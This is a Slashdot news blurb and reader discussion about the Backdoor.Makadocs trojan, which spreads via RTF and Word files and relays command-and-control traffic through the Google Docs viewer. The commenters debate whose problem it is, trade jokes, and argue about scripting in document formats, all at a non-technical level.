New Malware Variant Uses Google Docs As a Proxy To Phone Home 85
An anonymous reader writes "Windows 8 may block most malware out of the box, but there is still malware out there that thwarts Microsoft's latest and greatest. A new Trojan variant, detected as Backdoor.Makadocs and spread via RTF and Microsoft Word document marked as Trojan.Dropper, has been discovered that not only adds a clause to target Windows 8 and Windows Server 2012, but also uses Google Docs as a proxy server to phone home to its Command & Control (C&C) server."
google and microsoft targetted... (Score:2, Funny)
must be an apple patent somewhere
Re: (Score:3)
Is it really a Google problem though? If it were I'd expect it to work on any OS.
Yes. The document goes on Google Docs and then when it's accessed, the Google viewer sees the embedded link sends a request to the C&C server. It sounds like it's more a Google exploit than a MS exploit.
Re: (Score:2)
The already exploited box is the one putting information on google docs. It is used as a communication medium, like IRC or a p2p protocol.
Re: (Score:2)
The already exploited box is the one putting information on google docs. It is used as a communication medium, like IRC or a p2p protocol.
That isn't clear in the article.
If you understand how this works, it would be helpful if you explained the mechanics.
Re: (Score:1, Insightful)
A google problem? Having a public server? Yeah whatever you shill.
I know it's trendy and hipster to hate on google. but... NOBODY MAKES YOU USE ANY OF THEIR PRODUCTS OR SERVICES. which are free and quite open for stuff put out by a business. How dare they offer stuff people want in a non annoying way for free!
Unlike ohhhhhhhh... just about any other company out there.
And since when has ANYTHING made by microsoft been bulletproof? Or even doesn't leak like a screen door... never.
Re: (Score:2)
No, it uses Google to get around your (possibly existing) firewall. If you open the document from the Google server, the Google server sends a message to the C&C server.
Re: (Score:2)
Re: (Score:2)
If you opened the google doc, nothing would happen. It is a communication medium between command & control and the infected machines.
Re: (Score:1)
Funny, Anonymous Coward is having a conversation with himself!
Re: (Score:2)
Hmm.. if I read the article correctly, Google Docs is used to get around firewalls and communicate with C&C servers. Which is a violation of Google's terms of service. But I'll assume for the moment valid user credentials are (ab)used to access Google Docs.
But spreading via RTF and Word documents? That means this trojan only takes control through a vulnerability (or multiple ones?) in RTF and Word document handling. That would definitely be a Windows 8 problem.
Article itself is short on details unf
Re: (Score:3)
Also puts Google in a very wonderful spot because they can correct the problem by taking down said documents, and redirecting people to getting their PCs fixed.
Re: (Score:2)
Also puts Google in a very wonderful spot because they can correct the problem by taking down said documents, and redirecting people to getting their PCs fixed.
Which in turn is not only good citizenship but also great marketing.
Re: (Score:2)
But Google could stop any and all communication with the C&C server, even without checking for the presence of the Trojan.
Re: (Score:2)
They don't have to look through your docs. They just look at the place the malware is phoning home to.
Re:Yep. (Score:4, Interesting)
But spreading via RTF and Word documents? That means this trojan only takes control through a vulnerability (or multiple ones?) in RTF and Word document handling. That would definitely be a Windows 8 problem.
No, its definitely not a windows 8 problem. Its clearly a problem with the software reading RTF and Word documents. Last I checked, user accounts on all OS's, including Windows, Linux, OS/X, and BSD, could open up a socket and start hitting the network with whatever rights the user has.
The only place where it is acceptable to not allow networking by default is the land of mobile devices, and only some of them are actually like that.
Re:Yep. (Score:5, Interesting)
Even when Microsoft makes something bulletproof, these tech assholes have to blame a Google problem on Microsoft.
No.
It uses a vulnerability in RTF and Word documents to get into the system.
It only uses Google Docs as a fancy way to phone home.
Re: (Score:2)
Re: (Score:2)
Microsoft makes body armor now? Are they just small inserts like most motor sports body armor, of does it cover more of you? Is it Kevlar, ceramic, carbon fiber, or what? Maybe some of that memory foam that gets stronger than steel upon compression? I may be interested in some, if it's priced lower than Microsoft's stupid operating systems.
Servers (Score:2)
(looking at picture in article) I really have to wonder why malware authors use command and control servers covered in rust...
Re: (Score:2)
(looking at picture in article) I really have to wonder why malware authors use command and control servers covered in rust...
I'm sure it's goats blood, or human blood, or whatever they use for their search engine magic...
Re: (Score:3)
I'm sure it's goats blood, or human blood, or whatever they use for their search engine magic...
This is Symantec we're talking about. Their entire business model is "Hey, that's a nice computer you got there. It'd be a real shame if something were to... happen... to it." And we all know the murderous rage that powers McAfee. So it's probably not animal blood...
Re: (Score:2)
And we all know the murderous rage that powers McAfee.
With a side order of illicit drugs. Tasty, tasty roofies... (although given that the article I read said he was experimenting with rectal ingestion, not necessarily tasty...)
Re: (Score:2)
Re: (Score:2)
Account suspension (Score:1)
So, what happens when google suspends the account?
Re: (Score:1)
what happens when google suspends the account?
Re: (Score:2)
Some p2p request for a new list of accounts?
Re:Account suspension (Score:5, Informative)
The malware is not using Google Accounts at all. It is using Google Docs, literally, as a web proxy server. It is using the Google Docs Viewer (the one that can help view online PDFs and Docs in read only mode, without downloading it to your local system), to pass information to the C&C server. The only way Google can prevent this is, by using a captcha for suspicious requests.
Re: (Score:1)
Perhaps it pass information by GET request trough google 'quick view' link.
Re: (Score:2)
Yeah the quick view uses Google Docs Viewer. And yeah the information has to be encoded in the URL. One way as you said is to use parameters. Another way is to encoded it in the folder path or pdf file name itself. Another way is to encode it in the subdomain names, and wait for the request to hit your dns server.
Re: (Score:1)
John Gilmore (Score:5, Interesting)
Re: (Score:1)
Brilliant (Score:4, Funny)
Because of all the downtime on Google docs, the communication with the C&C server is intermittent and therefore difficult to pinpoint by law enforcement. Security by instability.
Re: (Score:1)
Just my personal experience here, but I have never been unable to access my Google Docs - YMMV.
Now ask me about Amazon and we can have a very long and interesting conversation...
Re: (Score:2)
Just my personal experience here, but I have never been unable to access my Google Docs - YMMV.
Ask your mom to unblock the service on your router.
Re:Brilliant (Score:4, Interesting)
Because of all the downtime on Google docs, the communication with the C&C server is intermittent and therefore difficult to pinpoint by law enforcement. Security by instability.
FYI, if you'd like to know how often Google docs (or any other Google Apps service) is unavailable, Google provides an on-line status dashboard [google.com] with both current and historical information going back two months.
Googling for overall uptime stats shows that in 2010, Apps achieved 99.984% uptime and in 2011 99.9949% uptime, even after changing the methodology to count all downtimes, not just those lasting more than 10 minutes.
Re:spread via RTF?! (Score:4, Insightful)
Dude, Microsoft gives system access to anything that asks for it. Sometimes, it pauses to ask the guy at the keyboard if he WANTS to give system access to 'allyourfilebelongtous.exe', but the boob at the board invariably clicks "yes".
Re:spread via RTF?! (Score:5, Insightful)
I would LOVE to meet the idiots that decided that document formats (such as Word, Excel, PDF, RTF etc) need to support full programming languages with system level access.
Old office formats (Word Perfect, Lotus etc) got by just fine without programmability so why do modern formats need it?
A special place in hell should be reserved for the person who decided to merge 2 of the least secure mainstream programs known to man and add support for embedding a Flash file into a PDF file.
Re: (Score:2)
Horses used to canter just fine without internal combustion, why do we need it?
Re: (Score:2, Insightful)
Jonwil does have a point. It would have been useful if users were presented with a simple model of programs that process data. Documents would be inherently safe, programs would be something potentially harmful. Bij embedding programs in documents the distinction is blurred. If the same combination would be presented and treated as a program containing a document the situation would be clearer. A plain document would be associated with a launcher that loads the (let's say) word processing application but no
Re: (Score:2)
Horses used to canter just fine without internal combustion, why do we need it?
Strangely, though, even American auto consumers never quite cottoned on to the idea of hydrogen bomb powered engines.
Re: (Score:2)
It have nothing to do with progress, RTF, PDF and DOC are mostly used to display formatted text with images or other media, why would anybody need any scripts there? We could easily abolish all those formats in favor of HTML + CSS + media files in folder or compressed container, as an added bonus we would not need google quick view than.
Re: (Score:1)
The RTF format doesn't support macros or any sort of scripting. Some RTF parsers are still vulnerable to buffer overflow attacks due to bugs in that particular software, so even with no embedded scripting in the RTF format arbitrary code can be executed as the parsing process.
As far as the need, I think macros in office products are justified. It's probably less useful in a document, but there are some very useful purposes for a macro in a spreadsheet. The key is, those macros need to be controlled to work
Re: (Score:2)
Sounds just like IRC (Score:5, Informative)
Sounds just like all the other malware which used to connect to IRC to take its orders. Only difference is the protocol now.
Bankaccount.Putmoney (Score:1)
> A new Trojan variant, detected as Backdoor.Makadocs and
> spread via RTF and Microsoft Word document marked as Trojan.Dropper
Ahhh, hackers are following good coding conventions about meaningful names (Object) dot (Verb). This is reassuring.
Re: (Score:2)
I had no idea what RTF is until I used Yahoo search. RTF stands for Rich Text Format that has been in use since around 1989. Do people still use RTF? Just asking because no one I know uses it. My friends and family use .doc and open office text .odt.
Yes, I am showing my age. lol
I wonder if Backdoor.Makadocs runs on older versions of Windows like Windows 7.
Lots of people use it. Using it avoids making any assumptions about what kind of word processing software is on your reader's system. Trust me, you've read plenty of RTFs and they're all over your system.
Innovative fix from google: (Score:2)
Update at 4:30PM EST: “Using any Google product to conduct this kind of activity is a violation of our product policies,” a Google spokesperson said in a statement.
In a related development, Microsoft fixed all its vulnerabilities by issuing a very simple patch. It is basically a statement issued by its spokesperson:"Using the vulnerabilities in Microsoft software is a violation of the our product policies".
Yale lock company and the Chubb safe companies too issued a joint statement saying, "picking our locks is a violation of our product policies".
Creative infection (Score:1)
I have to admit I am impressed. Using Google Docs as an infection vector is ingenious. Why would anyone want to work out of "the cloud."